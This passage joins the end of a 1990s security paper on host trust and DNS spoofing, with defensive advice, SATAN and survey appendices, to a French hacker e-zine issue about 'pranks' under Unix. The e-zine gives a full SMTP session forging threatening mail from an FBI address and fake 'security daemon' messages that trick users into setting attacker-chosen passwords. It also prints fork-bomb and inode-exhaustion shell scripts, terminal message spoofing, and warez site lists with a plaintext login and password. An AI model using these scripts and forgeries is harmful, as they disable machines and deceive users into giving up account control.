paper we use the word trust whenever there is a situation when a server
|
||
(note that any host that allows remote access can be called a server)
|
||
can permit a local resource to be used by a client without password
|
||
authentication when password authentication is normally required. In
|
||
other words, we arbitrarily limit the discussion to clients in disguise.
|
||
|
||
There are many ways that a host can trust: .rhosts and hosts.equiv files
|
||
that allow access without password verification; window servers that
|
||
allow remote systems to use and abuse privileges; export files that
|
||
control access via NFS, and more.
|
||
|
||
Nearly all of these rely on client IP address to hostname conversion to
|
||
determine whether or not service is to be granted. The simplest method
|
||
uses the /etc/hosts file for a direct lookup. However, today most hosts
|
||
use either DNS (the Domain Name Service), NIS, or both for name lookup
|
||
service. A reverse lookup occurs when a server has an IP address (from
|
||
a client host connecting to it) and wishes to get the corresponding
|
||
client hostname.
|
||
|
||
Although the concept of how host trust works is well understood by most
|
||
system administrators, the _dangers_ of trust, and the _practical_
|
||
problem it represents, irrespective of hostname impersonation, is one of
|
||
the least understood problems we know of on the Internet. This goes far
|
||
beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
|
||
systems -- indeed, much of the useful services in UNIX are based on the
|
||
concept that well known (to an administrator or user) sites are trusted
|
||
in some way. What is not understood is how networking so tightly binds
|
||
security between what are normally considered disjoint hosts.
|
||
|
||
Any form of trust can be spoofed, fooled, or subverted, especially when
|
||
the authority that gets queried to check the credentials of the client
|
||
is either outside of the server's administrative domain, or when the
|
||
trust mechanism is based on something that has a weak form of
|
||
authentication; both are usually the case.
|
||
|
||
Obviously, if the host containing the database (either NIS, DNS, or
|
||
whatever) has been compromised, the intruder can convince the target
|
||
host that s/he is coming from any trusted host; it is now sufficient to
|
||
find out which hosts are trusted by the target. This task is often
|
||
greatly helped by examining where system administrators and system
|
||
accounts (such as root, etc.) last logged in from. Going back to our
|
||
target, victim.com, you note that root and some other system accounts
|
||
logged in from big.victim.com. You change the PTR record for evil.com so
|
||
that when you attempt to rlogin in from evil.com to victim.com,
|
||
victim.com will attempt to look up your hostname and will find what you
|
||
placed in the record. If the record in the DNS database looks like:
|
||
|
||
1.192.192.192.in-addr.arpa IN PTR evil.com
|
||
|
||
And you change it to:
|
||
|
||
1.192.192.192.in-addr.arpa IN PTR big.victim.com
|
||
|
||
then, depending on how naive victim.com's system software is, victim.com
|
||
will believe the login comes from big.victim.com, and, assuming that
|
||
big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be
|
||
able to login without supplying a password. With NIS, it is a simple
|
||
matter of either editing the host database on the NIS master (if this is
|
||
controlled by the intruder) or of spoofing or forcing NIS (see
|
||
discussion on NIS security above) to supply the target with whatever
|
||
information you desire. Although more complex, interesting, and
|
||
damaging attacks can be mounted via DNS, time and space don't allow
|
||
coverage of these methods here.
|
||
|
||
Two methods can be used to prevent such attacks. The first is the most
|
||
direct, but perhaps the most impractical. If your site doesn't use any
|
||
trust, you won't be as vulnerable to host spoofing. The other strategy
|
||
is to use cryptographic protocols. Using the secure RPC protocol (used
|
||
in secure NFS, NIS+, etc.) is one method; although it has been "broken"
|
||
cryptographically, it still provides better assurance than RPC
|
||
authentication schemes that do not use any form of encryption. Other
|
||
solutions, both hardware (smartcards) and software (Kerberos), are being
|
||
developed, but they are either incomplete or require changes to system
|
||
software.
|
||
|
||
Appendix B details the results of an informal survey taken from a
|
||
variety of hosts on the Internet.
|
||
|
||
Protecting the system
|
||
---------------------
|
||
|
||
It is our hope that we have demonstrated that even some of the most
|
||
seemingly innocuous services run can offer (sometimes unexpectedly)
|
||
ammunition to determined system crackers. But, of course, if security
|
||
were all that mattered, computers would never be turned on, let alone
|
||
hooked into a network with literally millions of potential intruders.
|
||
Rather than reiterating specific advice on what to switch on or off, we
|
||
instead offer some general suggestions:
|
||
|
||
o If you cannot turn off the finger service, consider installing a
|
||
modified finger daemon. It is rarely necessary to reveal a user's home
|
||
directory and the source of last login.
|
||
|
||
o Don't run NIS unless it's absolutely necessary. Use NFS as little
|
||
as possible.
|
||
|
||
o Never export NFS filesystems unrestricted to the world. Try to
|
||
export file systems read-only where possible.
|
||
|
||
o Fortify and protect servers (e.g. hosts that provide a service to
|
||
other hosts -- NFS, NIS, DNS, whatever.) Only allow administrative
|
||
accounts on these hosts.
|
||
|
||
o Examine carefully services offered by inetd and the portmapper.
|
||
Eliminate any that aren't explicitly needed. Use Wietse Venema's inetd
|
||
wrappers, if for no other reason than to log the sources of connections
|
||
to your host. This adds immeasurably to the standard UNIX auditing
|
||
features, especially with respect to network attacks. If possible, use
|
||
the loghost mechanism of syslog to collect security-related information
|
||
on a secure host.
|
||
|
||
o Eliminate trust unless there is an absolute need for it. Trust is
|
||
your enemy.
|
||
|
||
o Use shadow passwords and a passwd command that disallows poor
|
||
passwords. Disable or delete unused/dormant system or user accounts.
|
||
|
||
o Keep abreast of current literature (see our suggested reading list and
|
||
bibliography at the end of this paper) and security tools; communicate
|
||
to others about security problems and incidents. At minimum, subscribe
|
||
to the CERT mailing list and phrack magazine (plus the firewalls mailing
|
||
list, if your site is using or thinking about installing a firewall) and
|
||
read the usenet security newsgroups to get the latest information on
|
||
security problems. Ignorance is the deadliest security problem we are
|
||
aware of.
|
||
|
||
o Install all vendor security patches as soon as possible, on all of
|
||
your hosts. Examine security patch information for other vendors - many
|
||
bugs (rdist, sendmail) are common to many UNIX variants.
|
||
|
||
It is interesting to note that common solutions to security problems
|
||
such as running Kerberos or using one-time passwords or digital tokens
|
||
are ineffective against most of the attacks we discuss here. We
|
||
heartily recommend the use of such systems, but be aware that they are
|
||
_not_ a total security solution -- they are part of a larger struggle to
|
||
defend your system.
|
||
|
||
Conclusions
|
||
-----------
|
||
|
||
Perhaps none of the methods shown here are surprising; when writing this
|
||
paper, we didn't learn very much about how to break into systems. What
|
||
we _did_ learn was, while testing these methods out on our own systems
|
||
and that of friendly sites, just how effective this set of methods is
|
||
for gaining access to a typical (UNIX) Internet host. Tiring of trying
|
||
to type these in all by hand, and desiring to keep our own systems more
|
||
secure, we decided to implement a security tool (SATAN) that attempts to
|
||
check remote hosts for at least some of the problems discussed here.
|
||
The typical response, when telling people about our paper and our tool
|
||
was something on the order of "that sounds pretty dangerous -- I hope
|
||
you're not going to give it out to everybody. But you since you can
|
||
trust me, may I have a copy of it?"
|
||
|
||
We never set out to create a cookbook or toolkit of methods and programs
|
||
on how to break into systems -- instead, we saw that these same methods
|
||
were being used, every day, against ourselves and against friendly
|
||
system administrators. We believe that by propagating information that
|
||
normally wasn't available to those outside of the underworld, we can
|
||
increase security by raising awareness. Trying to restrict access to
|
||
"dangerous" security information has never seemed to be a very effective
|
||
method for increasing security; indeed, the opposite appears to be the
|
||
case, since the system crackers have shown little reticence to share
|
||
their information with each other.
|
||
|
||
While it is almost certain that some of the information presented here
|
||
is new material to (aspiring) system crackers, and that some will use it
|
||
to gain unauthorized entrance onto hosts, the evidence presented even by
|
||
our ad hoc tests shows that there is a much larger number of insecure
|
||
sites, simply because the system administrators don't know any better --
|
||
they aren't stupid or slow, they simply are unable to spend the very
|
||
little free time that they have to explore all of the security issues
|
||
that pertain to their systems. Combine that with no easy access to this
|
||
sort of information and you have poorly defended systems. We (modestly)
|
||
hope that this paper will provide badly-needed data on how systems are
|
||
broken into, and further, to explain _why_ certain steps should be taken
|
||
to secure a system. Knowing why something is a problem is, in our
|
||
opinion, the real key to learning and to making an informed, intelligent
|
||
choice as to what security really means for your site.
|
||
|
||
----
|
||
|
||
Appendix A:
|
||
|
||
SATAN (Security Analysis Tool for Auditing Networks)
|
||
|
||
Originally conceived some years ago, SATAN is actually the prototype of
|
||
a much larger and more comprehensive vision of a security tool. In its
|
||
current incarnation, SATAN remotely probes and reports various bugs and
|
||
weaknesses in network services and windowing systems, as well as
|
||
detailing as much generally useful information as possible about the
|
||
target(s). It then processes the data with a crude filter and what
|
||
might be termed an expert system to generate the final security
|
||
analysis. While not particularly fast, it is extremely modular and easy
|
||
to modify.
|
||
|
||
SATAN consists of several sub-programs, each of which is an executable
|
||
file (perl, shell, compiled C binary, whatever) that tests a host for a
|
||
given potential weakness. Adding further test programs is as simple as
|
||
putting an executable into the main directory with the extension ".sat";
|
||
the driver program will automatically execute it. The driver generates
|
||
a set of targets (using DNS and a fast version of ping together to get
|
||
"live" targets), and then executes each of the programs over each of the
|
||
targets. A data filtering/interpreting program then analyzes the
|
||
output, and lastly a reporting program digests everything into a more
|
||
readable format.
|
||
|
||
The entire package, including source code and documentation, will be
|
||
made freely available to the public, via anonymous ftp and by posting it
|
||
to one of the numerous source code groups on the Usenet.
|
||
|
||
----
|
||
|
||
Appendix B:
|
||
|
||
An informal survey conducted on about a dozen Internet sites
|
||
(educational, military, and commercial, with over 200 hosts and 40000
|
||
accounts) revealed that on the average, close to 10 percent of a site's
|
||
accounts had .rhosts files. These files averaged six trusted hosts
|
||
each; however, it was not uncommon to have well over one hundred entries
|
||
in an account's .rhosts file, and on a few occasions, the number was
|
||
over five hundred! (This is not a record one should be proud of
|
||
owning.) In addition, _every_ site directly on the internet (one site
|
||
was mostly behind a firewall) trusted a user or host at another site --
|
||
thus, the security of the site was not under the system administrators
|
||
direct control. The larger sites, with more users and hosts, had a
|
||
lower percentage of users with .rhosts files, but the size of .rhosts
|
||
files increased, as well as the number of trusted off-site hosts.
|
||
|
||
Although it was very difficult to verify how many of the entries were
|
||
valid, with such hostnames such as "Makefile", "Message-Id:", and
|
||
"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
|
||
question the wisdom of putting a site's security in the hands of its
|
||
users. Many users (especially the ones with larger .rhosts files)
|
||
attempted to put shell-style comments in their .rhosts files, which most
|
||
UNIX systems attempt to resolve as valid host names. Unfortunately, an
|
||
attacker can then use the DNS and NIS hostname spoofing techniques
|
||
discussed earlier to set their hostname to "#" and freely log in. This
|
||
puts a great many sites at risk (at least one major vendor ships their
|
||
systems with comments in their /etc/hosts.equiv files.)
|
||
|
||
You might think that these sites were not typical, and, as a matter of
|
||
fact, they weren't. Virtually all of the administrators knew a great
|
||
deal about security and write security programs for a hobby or
|
||
profession, and many of the sites that they worked for did either
|
||
security research or created security products. We can only guess at
|
||
what a "typical" site might look like.
|
||
|
||
----
|
||
|
||
Appendix C:
|
||
|
||
After receiving mail from a site that had been broken into from one of
|
||
our systems, an investigation was started. In time, we found that the
|
||
intruder was working from a list of ".com" (commercial) sites, looking
|
||
for hosts with easy-to steal password files. In this case,
|
||
"easy-to-steal" referred to sites with a guessable NIS domainname and an
|
||
accessible NIS server. Not knowing how far the intruder had gotten, it
|
||
looked like a good idea to warn the sites that were in fact vulnerable
|
||
to password file theft. Of the 656 hosts in the intruder's hit list, 24
|
||
had easy-to-steal password files -- about one in twenty-five hosts! One
|
||
third of these files contained at least one password-less account with
|
||
an interactive shell. With a grand total of 1594 password-file entries,
|
||
a ten-minute run of a publically-available password cracker (Crack)
|
||
revealed more than 50 passwords, using nothing but a low-end Sun
|
||
workstation. Another 40 passwords were found within the next 20
|
||
minutes; and a root password was found in just over an hour. The result
|
||
after a few days of cracking: five root passwords found, 19 out of 24
|
||
password files (eighty percent) with at least one known password, and
|
||
259 of 1594 (one in six) passwords guessed.
|
||
|
||
----
|
||
|
||
Appendix D:
|
||
|
||
How to get some free security resources on the Internet
|
||
|
||
Mailing lists:
|
||
|
||
o The CERT (Computer Emergency Response Team) advisory mailing list.
|
||
Send e-mail to cert@cert.org, and ask to be placed on their mailing
|
||
list.
|
||
|
||
o The Phrack newsletter. Send an e-mail message to
|
||
phrack@well.sf.ca.us and ask to be added to the list.
|
||
|
||
o The Firewalls mailing list. Send the following line to
|
||
majordomo@greatcircle.com:
|
||
|
||
subscribe firewalls
|
||
|
||
o Computer Underground Digest. Send e-mail to
|
||
tk0jut2@mvs.cso.niu.edu, asking to be placed on the list.
|
||
|
||
Free Software:
|
||
|
||
COPS (Computer Oracle and Password System) is available via anonymous
|
||
ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.
|
||
|
||
The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
|
||
in pub/security.
|
||
|
||
The latest version of berkeley sendmail is available via anonymous ftp
|
||
from ftp.cs.berkeley.edu, in ucb/sendmail.
|
||
|
||
Sources for ftpd and many other network utilities can be found in
|
||
ftp.uu.net, in packages/bsd-sources.
|
||
|
||
Source for ISS (Internet Security Scanner), a tool that remotely scans
|
||
for various network vulnerabilities, is available via anonymous ftp from
|
||
ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
|
||
|
||
Securelib is available via anonymous ftp from ftp.uu.net, in
|
||
usenet/comp.sources.misc/volume36/securelib.
|
||
|
||
----
|
||
|
||
Bibliography:
|
||
|
||
Baldwin, Robert W., Rule Based Analysis of Computer Security,
|
||
Massachusetts Institute of Technology, June 1987.
|
||
|
||
Bellovin, Steve, Using the Domain Name System for System Break-ins,
|
||
1992 (unpublished).
|
||
|
||
Massachusetts Institute of Technology, X Window System Protocol,
|
||
Version 11, 1990.
|
||
|
||
Shimomura, Tsutomu, private communication.
|
||
|
||
Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
|
||
|
||
----
|
||
|
||
Suggested reading:
|
||
|
||
Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
|
||
Computer Communication Review 19 (2), 1989; a comment by Stephen
|
||
Kent appears in volume 19 (3), 1989.
|
||
|
||
Garfinkle, Simson and Spafford, Gene, "Practical UNIX Security",
|
||
O'Reilly and Associates, Inc., 1992.
|
||
|
||
Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
|
||
Study: Network Information Service", Computer Communication Review
|
||
22 (5) 1992.
|
||
|
||
Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
|
||
Four, Issue Forty-Three, File 14 of 27.
|
||
|
||
Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept
|
||
1993.
|
||
|
||
Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
|
||
Protocal", Purdue University, August 1993.
|
||
|
||
Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
|
||
27 (8), 1984.
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.12
|
||
|
||
o/~ Paranoia ! o/~ Paranoia o/~
|
||
---===***###> Plaisanter sous Unix <###***===---
|
||
o/~ They are Back ! o/~
|
||
|
||
Vous vous etes toujours demand‚ comment jouer des farces sous Unix,
|
||
comment foutres les boules a vos potes, a votre administrateur, jouer au con
|
||
avec le psyche des autres, faire du SEAO? Eh bien voila le but de cet autre
|
||
petit ++N-Phile. Amusez vous bien !
|
||
|
||
[ nota : tout ce qui est tap‚ au clavier est pr‚c‚d‚ de ">>>" ]
|
||
|
||
> Mailer sous un autre nom:
|
||
========================
|
||
Pour cela, il faut connaitre les bases du transfer de mail. Le mail sous Unix
|
||
est transporte de machine en machine par "sendmail" qui ‚coute les messages des
|
||
autres mailers ou de ses clients sur le port TCP num‚ro 25.
|
||
|
||
DaubeNet {101} grep smtp /etc/services
|
||
smtp 25/tcp mail
|
||
|
||
Donc il suffit de se connecter la bas et de respecter le protocole SMTP
|
||
(Simple Message Transfer Protocol) plus une petite astuce pour faire un faux
|
||
mail qui pourrait venir de n'importe ou.
|
||
|
||
----------------------
|
||
DaubeNet {102} >>> telnet localhost 25
|
||
Trying 127.0.0.1...
|
||
Connected to univ-anon.fr.
|
||
Escape character is '^]'.
|
||
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600
|
||
220 ESMTP spoken here
|
||
>>>help
|
||
214-Commands:
|
||
214- HELO EHLO MAIL RCPT DATA
|
||
214- RSET NOOP QUIT HELP VRFY
|
||
214- EXPN VERB
|
||
214-For more info use "HELP <topic>".
|
||
214-To report bugs in the implementation send email to
|
||
214- sendmail@CS.Berkeley.EDU.
|
||
214-For local information send email to Postmaster at your site.
|
||
214 End of HELP info
|
||
>>>help helo
|
||
214-HELO <hostname>
|
||
214- Introduce yourself.
|
||
214 End of HELP info
|
||
>>>help mail
|
||
214-MAIL FROM: <sender>
|
||
214- Specifies the sender.
|
||
214 End of HELP info
|
||
>>>help rcpt
|
||
214-RCPT TO: <recipient>
|
||
214- Specifies the recipient. Can be used any number of times.
|
||
214 End of HELP info
|
||
>>>help data
|
||
214-DATA
|
||
214- Following text is collected as the message.
|
||
214- End with a single dot.
|
||
214 End of HELP info
|
||
>>>help quit
|
||
214-QUIT
|
||
214- Exit sendmail (SMTP).
|
||
214 End of HELP info
|
||
>>>quit
|
||
221 DaubeNet closing connection
|
||
Connection closed by foreign host.
|
||
----------------------
|
||
|
||
Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger
|
||
un mail. C'est trŠs facile mais il y a une bidouille qu'il faut connaitre et
|
||
qui vous trahi si vous ne la connaissez pas.
|
||
|
||
----------------------
|
||
DaubeNet {103} >>> telnet localhost 25
|
||
Trying 127.0.0.1...
|
||
Connected to univ-anon.fr.
|
||
Escape character is '^]'.
|
||
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
|
||
220 ESMTP spoken here
|
||
>>>helo ducon.fbi.com
|
||
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
|
||
>>>mail from: root@ducon.fbi.com
|
||
250 root@ducon.fbi.com... Sender ok
|
||
>>>rcpt to: fred
|
||
250 fred... Recipient ok
|
||
>>>data
|
||
354 Enter mail, end with "." on a line by itself
|
||
>>>
|
||
>>>Please, would you stop playing with my Unix system otherwise i'll
|
||
>>>send a wet operation commando to your university.
|
||
>>>
|
||
>>>Nigel X.
|
||
>>>System Administrator at FBI Inc.
|
||
>>>root@fbi.com
|
||
>>>.
|
||
250 DAA00299 Message accepted for delivery
|
||
>>>quit
|
||
221 DaubeNet closing connection
|
||
Connection closed by foreign host.
|
||
----------------------
|
||
|
||
Haha, ca y est, on a envoy‚ notre petite bidouille et le mec va avoir les
|
||
jetons de sa vie:
|
||
|
||
----------------------
|
||
DaubeNet {104} >>> mail
|
||
Mail version 5.5 6/1/90. Type ? for help.
|
||
"/var/mail/fred": 1 message 1 new
|
||
>N 1 root@ducon.fbi.com Thu Sep 15 03:55 14/508
|
||
& >>>1
|
||
Message 1:
|
||
From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
|
||
From: root@ducon.fbi.com
|
||
Apparently-To: fred [ * ]
|
||
|
||
Please, would you stop playing with my Unix system otherwise i'll
|
||
send a wet operation commando to your university.
|
||
|
||
Nigel X.
|
||
System Administrator at FBI Inc.
|
||
root@fbi.com
|
||
|
||
& >>>d
|
||
& >>>q
|
||
----------------------
|
||
|
||
Arghh... Vous avez vu comme moi la ligne ou j'ai mis une ast‚risque entre
|
||
crochets : C'est marqu‚: "Apparently-To: " arghhh... Ca fait vraiment pas
|
||
serieux n'est ce pas?
|
||
C'est ce qui vous trahi quand vous ne connaissez pas la bidouille.
|
||
Et en parlant de bidouille, la voici...
|
||
|
||
----------------------
|
||
DaubeNet {105} >>> telnet localhost 25
|
||
Trying 127.0.0.1...
|
||
Connected to univ-anon.fr.
|
||
Escape character is '^]'.
|
||
220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
|
||
220 ESMTP spoken here
|
||
>>>helo
|
||
250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
|
||
>>>mail from: root@fbi.com
|
||
250 root@fbi.com... Sender ok
|
||
>>>rcpt to: fred
|
||
250 fred... Recipient ok
|
||
>>>data
|
||
354 Enter mail, end with "." on a line by itself
|
||
>>>To: fred@univ-anon.fr [ * ]
|
||
>>>
|
||
>>>Good afternoon,
|
||
>>>
|
||
>>> Could you please stop playing with my unix system otherwise i'll
|
||
>>>be forced to send one of our wet operations' commando to execute you.
|
||
>>>
|
||
>>>Nigel X, System Administrator at Fbi Inc.
|
||
>>>.
|
||
250 DAA00307 Message accepted for delivery
|
||
>>>quit
|
||
221 DaubeNet closing connection
|
||
Connection closed by foreign host.
|
||
----------------------
|
||
|
||
Vous regarderez attentivement la premiere ligne tap‚e aprŠs le DATA.
|
||
C'est un "To: " suivi de l'adresse a qui on envoie...
|
||
Et voila le r‚sultat:
|
||
|
||
----------------------
|
||
DaubeNet {106} >>> mail
|
||
Mail version 5.5 6/1/90. Type ? for help.
|
||
"/var/mail/fred": 1 message 1 new
|
||
>N 1 root@fbi.com Thu Sep 15 03:57 14/509
|
||
& >>>1
|
||
Message 1:
|
||
From root@fbi.com Thu Sep 15 03:57:41 1994
|
||
From: root@fbi.com
|
||
To: fred@univ-anon.fr
|
||
|
||
Good afternoon,
|
||
|
||
Could you please stop playing with my unix system otherwise i'll
|
||
be forced to send one of our wet operations' commando to execute you.
|
||
|
||
Nigel X, System Administrator at Fbi Inc.
|
||
|
||
& >>>d
|
||
& >>>q
|
||
DaubeNet {107} exit
|
||
----------------------
|
||
|
||
C'est beau non la technique... ;)
|
||
|
||
Grace … cela vous pouvez commencer … lancer la terreur sur votre r‚seau.
|
||
|
||
Hacking Psychology:
|
||
==================
|
||
Les utilisateurs sont par d‚finition trŠs soumis (et c'est pour cela
|
||
que l'on distingue les hackers, ils refusent cette soumission.) Pour un user
|
||
lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe
|
||
qui peut faire du faux mail...
|
||
|
||
Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont
|
||
completement flooder toute la boite aux lettre de votre/vos victime(s).
|
||
|
||
Mais il y a plus interressant.
|
||
Imaginez que quelqu'un recoive un message de: security-daemon@<votre site>
|
||
disant:
|
||
-----
|
||
* This is and automated mailing : don't reply *
|
||
|
||
We have found that your password is insecure. You should change this
|
||
otherwise your account will be disabled.
|
||
|
||
Please use the password "ItG-4v3" instead.
|
||
|
||
Thank you.
|
||
Security Daemon.
|
||
-----
|
||
Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de
|
||
comptes. Une fois, j'ai r‚ussi mˆme … faire changer le mot de passe de
|
||
*l'admin* !!!!! Quel con, il ob‚it … des packages de s‚curit‚ qu'il n'a mˆme
|
||
pas install‚. AHahaha !
|
||
|
||
Foutre un systeme sur les genoux:
|
||
================================
|
||
Pour cela il y a des petits trucs tout con … faire si vous n'avez pas
|
||
d'accounting:
|
||
cr‚ez un petit script "toto" de ce type:
|
||
#!/bin/sh
|
||
mkdir ./-fuck
|
||
cp ./toto ./-fuck/toto
|
||
cd ./-fuck
|
||
./toto
|
||
|
||
Hehe, le truc va faire de plus en plus de directory et la machine s'arretera
|
||
par manque d'inode.
|
||
|
||
On peut aussi faire dans le meme genre un fichier "foo":
|
||
#!/bin/csh
|
||
./foo &
|
||
./foo &
|
||
./foo &
|
||
|
||
hehe, effet tout aussi garanti...
|
||
|
||
On peut mˆme mixer les deux !
|
||
|
||
Les messages fantomes:
|
||
=====================
|
||
Vous savez, quand vous faites un write la personne … qui il est d‚stin‚
|
||
recoit:
|
||
Message from <luser> at/...
|
||
Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes
|
||
non??
|
||
Eh bien c'est possible:
|
||
Il faut savoir comment ca marche. Chaque utilisateur logg‚ a au moins un
|
||
terminal. Ce terminal est repr‚sent‚ dans le systŠme Unix comme un nom de
|
||
p‚riph‚rique du type: /dev/ttyXX ou XX est g‚n‚ralement un nombre ou une lettre
|
||
et un nombre.
|
||
Bref, c'est la dessus qu'‚crit la commande write.
|
||
Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en
|
||
‚criture sur ce p‚riph‚rique. Sur les anciens systŠme, l'appel systŠme
|
||
vhangup() n'‚xistait pas et on pouvait donc se connecter, regarder les
|
||
terminaux disponibles (nons attribu‚s … des users donc en lecture et ecriture
|
||
pour tout le monde) et faire un cat dessus comme ceci:
|
||
$ cat >/dev/tty02
|
||
ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge
|
||
par ce terminal.
|
||
Ensuite, pr‚parer a cot‚ le :
|
||
|
||
Message from root at...
|
||
Veuillez changer imm‚diatement votre mot de passe en: "TuY5;tK"
|
||
Merci. Votre administrateur systŠme.
|
||
<EOT>
|
||
|
||
Fun isn't it?
|
||
|
||
S'amuser avec les ‚mulateurs de terminaux:
|
||
=========================================
|
||
Vous savez que par exemple zmodem envoie une chaine de caractŠre qui
|
||
lance automatiquement Zmodem en reception du cote de l'‚mulateur de terminaux.
|
||
C'est trŠs interressant car on peut faire appeler intempestivement Zmodem dans
|
||
l'‚mulateur si telle ou telle personne en message on utilise un ‚mulateur de
|
||
terminaux.
|
||
|
||
Il suffit d'enregistrer la s‚quence envoy‚e par Zmodem pour d‚clancher l'appel
|
||
de Zmodem et hop, bienvenue en enfer !
|
||
|
||
Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c
|
||
et son ancetre qui ne le fait pas mais est sympa: flash.c.
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.13
|
||
|
||
|
||
^^^^^^^^^^^^^^^^^^^^^^^^^
|
||
>>>>>>>> du cote <<<<<<<<
|
||
======= d'internet ======
|
||
vvvvvvvvvvvvvvvvvvvvvvvvv
|
||
|
||
Chez les internetiens, ca a boug‚ sacrement, apres les emmerde de Philip
|
||
Zimmerman accus‚ par la NSA et la CIA d'avoir export‚ un logiciel de
|
||
cryptographie (PGP) les hackers se sont mis a remuer sec.
|
||
Le probleme de PGP a ‚t‚ r‚solu, la version 2.5 est interdite … l'export
|
||
mais la 2.6 est okay et exportable !
|
||
STICK WITH 2.5, IT'S THE MOST SECURE!
|
||
|
||
Les experts en s‚curit‚ d'une grosse agence francaise ont d‚clar‚ recemment:
|
||
"On leur a bien fait la nique"...
|
||
|
||
J'ai bien peur que la plus grosse "nique" ce soit nous qui la faisions
|
||
prochainnement. En effet, beaucoup de jeunes hackers se sont lanc‚s a fond
|
||
dans le hack professionel.
|
||
|
||
Grace … des listes de diffusions comme 8lgm et bugtraq, ils ont acqui un
|
||
savoir faire impressionant. A suivre...
|
||
|
||
| Underground sites |
|
||
|
||
Sur Internet, il y a des serveurs FTP ou FSP qui h‚bergent sans le
|
||
savoir des sanctuaires du hacking ou de la scene 0-day warez.
|
||
Voici une petite liste qui a ‚t‚ r‚cuper‚e aux USA:
|
||
============
|
||
----++++ Betaz List ++++----
|
||
-= These sites are up 9.05.94 =-
|
||
------------------------------------------------------------------------------
|
||
FTP
|
||
~~~
|
||
sy2000.cet.fsu.edu /incoming/msdos/.<tab>/.^l^k pc|mac|fast
|
||
cs.uidaho.edu /pub/incoming/MacPGP/"<tab><tab>" pc|mac
|
||
130.246.23.9 /pub/others/".. "/".. " pc|mac
|
||
130.246.17.54 /pub/".. "/".cache " " "
|
||
brinta.ptf.hro.nl ** Private **
|
||
160.78.31.26 /incoming/".. " pc
|
||
ic16.ee.umanitoba.ca /pub/PSCAD_RTDS/incoming/te few
|
||
acme.fred.org /pub/msdos/Tmp/^X few
|
||
|
||
Console
|
||
~~~~~~~
|
||
syr.edu /software/unix/kip/dpf snes|sega
|
||
131.215.46.20 1717 snesapalooza
|
||
|
||
To add to or recieve an updated list
|
||
mail an112452 or msg betaz on irc
|
||
============
|
||
Voila, donc vous pouvez aller y faire des tours, c'est pas mal.
|
||
Ce sont des warez en general de bonne qualit‚.
|
||
|
||
Et voila une autre liste:
|
||
============
|
||
FDISK and FERN's Warez List 9:09PM 8/24/94 Atlantic FDISK V5.6
|
||
All of the sites have been test as of the date and time above
|
||
|
||
FTP
|
||
Site Dir Submitted By
|
||
--------------------------------------------------------------------
|
||
corto.inria.fr /broadcast/^K^E^F^E^L Skippy
|
||
tiger.vut.edu.au login:r9202044 Pass:Daavee ".. "
|
||
192.54.41.33 /pub/avs_mirror/pub/siggraph/uploads/"..." cc
|
||
acme.fred.org /pub/msdos/tmp/".. " swazi
|
||
130.246.23.9 /pub/others Hi-Fi
|
||
|
||
Site Port Submitted By
|
||
--------------------------------------------------------------------
|
||
130.161.39.3 5300 Wowzer
|
||
128.206.29.11 12321 Bryer
|
||
158.132.79.228 1997 casey(anon 10285)
|
||
============
|
||
|
||
| IRC |
|
||
|
||
Vous connaissez IRC? L'Internet Relay Chat... C'est le havre dans
|
||
lequel tous les internet junkies viennent discuter de n'importe quoi.
|
||
|
||
Un des "channel" les plus virulent est #hack (suivi de pres par #warez et
|
||
#phreak). La dedans se livre une petite guerre permanente … qui aura les
|
||
droits operateurs sur le channel, pour cela, nous avons recours … des outils
|
||
assez rigolos. Tout d'abord, chaque bon hacker qui se respecte a sa propre
|
||
armure personnelle le protegeant des divers Tsunamis ou Rolling Bombs qui ne
|
||
sont que des attaques software destin‚es … virer quelqu'un du channel.
|
||
Les plus connus de ces logiciels sont GargOyle et Serpent de Vassago, personnage
|
||
tres controvers‚ sur Internet.
|
||
(gargoyle.tar.Z, serpent.tar.Z, ircdfens.tar.Z, util662.tar.Z, textbox.tar.Z)
|
||
Ensuite vient le hack hard qui passe souvent par l'arret de serveur IRC
|
||
isolant un connecte de l'ensemble des autres connecte et qui donne ainsi les
|
||
chanops (channel operators) au connecte isole.
|
||
Fun isn't it?
|
||
|
||
La pluspart du temps vous ne trouverez personne d'interessant au premier abord
|
||
sur #hack. Mais de nombreuses personnes interressantes y passent souvent.
|
||
Donc la premiere impression de conneries inutiles n'est pas forcemment vraie
|
||
pour tout le monde.
|
||
|
||
Comment se connecter sur IRC?
|
||
- - - - - - - - - - - - - - -
|
||
Eh bien tout d'abord il vous faut un client IRC que vous compilerez
|
||
pour votre unix (si vous avez un PC sous SLIP et PPP, il vous faudra chercher
|
||
un client IRC pour PC). Ensuite, vous devrez trouver un serveur IRC qui
|
||
marche dans votre coins (pas trop loin dans le reseau) et qui vous accepte en
|
||
